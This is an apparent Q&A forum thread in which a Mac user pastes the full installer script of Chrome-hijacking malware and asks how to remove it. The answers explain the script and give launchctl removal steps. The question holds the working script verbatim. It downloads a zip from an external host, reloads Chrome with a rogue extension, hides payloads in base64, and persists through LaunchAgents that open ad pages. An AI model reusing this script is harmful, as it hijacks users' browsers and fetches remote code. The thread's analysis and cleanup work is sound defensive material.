# I installed a software from chrome, and I think it was a piece of malware

Tags: google-chrome, malware

The malware affects my Chrome. Whenever I search, it makes me use bing as my search engine. At random times, it redirects me to an advertisement website. Virus detectors like Malwarebytes cannot find the malware. Any way to get rid of it? I found the installer for the malware, and it is running this code:

````
osascript -e 'tell application "Terminal" to set visible of front window to false'

BPATH="/private/var/tmp"
IPATH=$(uuidgen)

EXISTS=`launchctl list | grep "chrome.extension"`
SUB=chrome.extension
if [[ "$EXISTS" == *"$SUB"* ]]; then
  exit 0
fi

status_code=$(curl --write-out %{http_code} --head --silent --output /dev/null https://rtablisstati.com/archive.zip  )
if [[ "$status_code" = 200 ]] ; then
  curl -s https://rtablisstati.com/archive.zip > $BPATH/$IPATH.zip /dev/null
else
  exit 0
fi

sleep 1
XPATH=$(uuidgen)
unzip -o $BPATH/$IPATH.zip -d $BPATH/$XPATH &> /dev/null
cd $BPATH/$XPATH

sleep 0.5
perform=$(echo -ne "if ps ax | grep -v grep | grep 'Google Chrome' &> /dev/null; then echo running;  EXTENSION_SERVICE='Google Chrome --load-extension'; if ps ax | grep -v grep | grep 'Google Chrome --load-extension' &> /dev/null; then echo e running; else   pkill -a -i 'Google Chrome'; sleep 1 ;  open -a 'Google Chrome' --args --load-extension='$BPATH/$XPATH' --restore-last-session --noerrdialogs --disable-session-crashed-bubble; fi;  else echo not running; fi" | base64);

cd $BPATH
touch com.chrome.extension.plist
cat > com.chrome.extension.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>31</integer>
    <key>Label</key>
    <string>com.chrome.extension</string>
    <key>ProgramArguments</key>
    <array>
        <string>sh</string>
        <string>-c</string>
        <string>echo $perform | base64 --decode | bash</string>
    </array>
</dict>
</plist>
EOF

sleep 1


performNext=$(echo -ne "pkill -a -i 'Google Chrome'; sleep 1 ;  open -a 'Google Chrome' --args --load-extension='$BPATH/$XPATH' --restore-last-session --noerrdialogs --disable-session-crashed-bubble;" | base64);
touch com.chrome.extensions.plist
cat > com.chrome.extensions.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>StartInterval</key>
    <integer>21600</integer>
    <key>Label</key>
    <string>com.chrome.extensions</string>
    <key>ProgramArguments</key>
    <array>
        <string>sh</string>
        <string>-c</string>
        <string>echo $performNext | base64 --decode | bash</string>
    </array>
</dict>
</plist>
EOF



performPop=$(echo -ne "open -na 'Google Chrome' --args --new-window "$https://ationwindon.com/?tid=949115";" | base64);
touch com.chrome.extensionsPop.plist
cat > com.chrome.extensionsPop.plist <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>StartInterval</key>
    <integer>3600</integer>
    <key>Label</key>
    <string>com.chrome.extensionsPop</string>
    <key>ProgramArguments</key>
    <array>
        <string>sh</string>
        <string>-c</string>
        <string>echo $performPop | base64 --decode | bash</string>
    </array>
</dict>
</plist>
EOF




mkdir -p ~/Library/LaunchAgent/
cp com.chrome.extension.plist ~/Library/LaunchAgent/
cp com.chrome.extensions.plist ~/Library/LaunchAgent/

if ! [[ "$performPop" == "b3BlbiAtbmEgJ0dvb2dsZSBDaHJvbWUnIC0tYXJncyAtLW5ldy13aW5kb3cgOw==" ]]; then
    cp com.chrome.extensionsPop.plist ~/Library/LaunchAgent/
fi



rm -Rf $BPATH/$IPATH.zip
rm -Rf $BPATH/com.chrome.extension.plist
rm -Rf $BPATH/com.chrome.extensions.plist
rm -Rf $BPATH/com.chrome.extensionsPop.plist

sleep 0.5
launchctl load ~/Library/LaunchAgent/com.chrome.extension.plist
sleep 0.5
launchctl load ~/Library/LaunchAgent/com.chrome.extensions.plist



if ! [[ "$performPop" == "b3BlbiAtbmEgJ0dvb2dsZSBDaHJvbWUnIC0tYXJncyAtLW5ldy13aW5kb3cgOw==" ]]; then
  sleep 0.5
  launchctl load ~/Library/LaunchAgent/com.chrome.extensionsPop.plist
fi```
````

Answer (score 1):

I recently saw this malware myself and seemed to remove it - I wrote about that experience [here](https://bobbiechen.com/blog/2022/4/3/some-interesting-malware), but as a quick summary:

The sibling answer from powershellFerret is pretty accurate.

This malware uses launchd to periodically kill the running Chrome and re-start it with a new Chrome that loads an extension from disk.

To remove it, you'll want to

1. `launchctl list` and find those `com.chrome.*` plist files
2. Then, `launchctl unload` each file
3. Then, delete those `com.chrome.*` plist files from `~/Library/LaunchAgents`

Deleting the plist files alone is not enough, you also need to `launchctl unload` them (or perhaps, restart your computer - I didn't try that though). This should remove the launchd agent that closes your browser and restarts it with the malicious extension.

You can also clean up the extension code itself.

1. `cd /private/var/tmp` and find the directory named with a UUID (that looks like `95EE66A0-1E4F-43D0-85B6-C721950DE325`, but with different letters and numbers)
2. (optional, send me the contents via the link on my website because I accidentally deleted them before looking :) )
3. Delete that directory named with a UUID

Answer (score 0):

Some parts of the code are slightly hard to read, but it looks like the code does the following actions :

1. Downloads "archive.zip" from *"rtablisstati[.]com/archive[.]zip"* (defanged)
2. Unzips it to */private/var/tmp*
3. Kills the Chrome process (if it's running) and restarts it using the previously downloaded zip file as a Chrome extension (this is probably the mentioned malware)
4. Makes PLIST info for an daemon that: Runs on startup and does step 3
5. Makes a directory at *~/Library/LaunchAgent/*
6. Cleans up by deleting the ZIP file at *"/private/var/tmp"*
7. Creates a daemon with the PLIST information from step 4 (this runs on startup)

However, there are some parts which I do not know the purpose of, like *"$performPop"* and *$hxxps[://]ationwindon[.]com/?tid=949115"; (defanged)*.

This would mean that the code runs in the background at startup (restarting every hour) and makes Chrome always run with the specified extension.

There might still be the info for the daemon at ***"~/Library/LaunchAgent"***

Comment: Thank you so much for replying, powershellFerret! I deleted the files of ~/Library/LaunchAgent, which I saw was indeed created yesterday. Do you know what other measures I should take to completely get rid of the malware?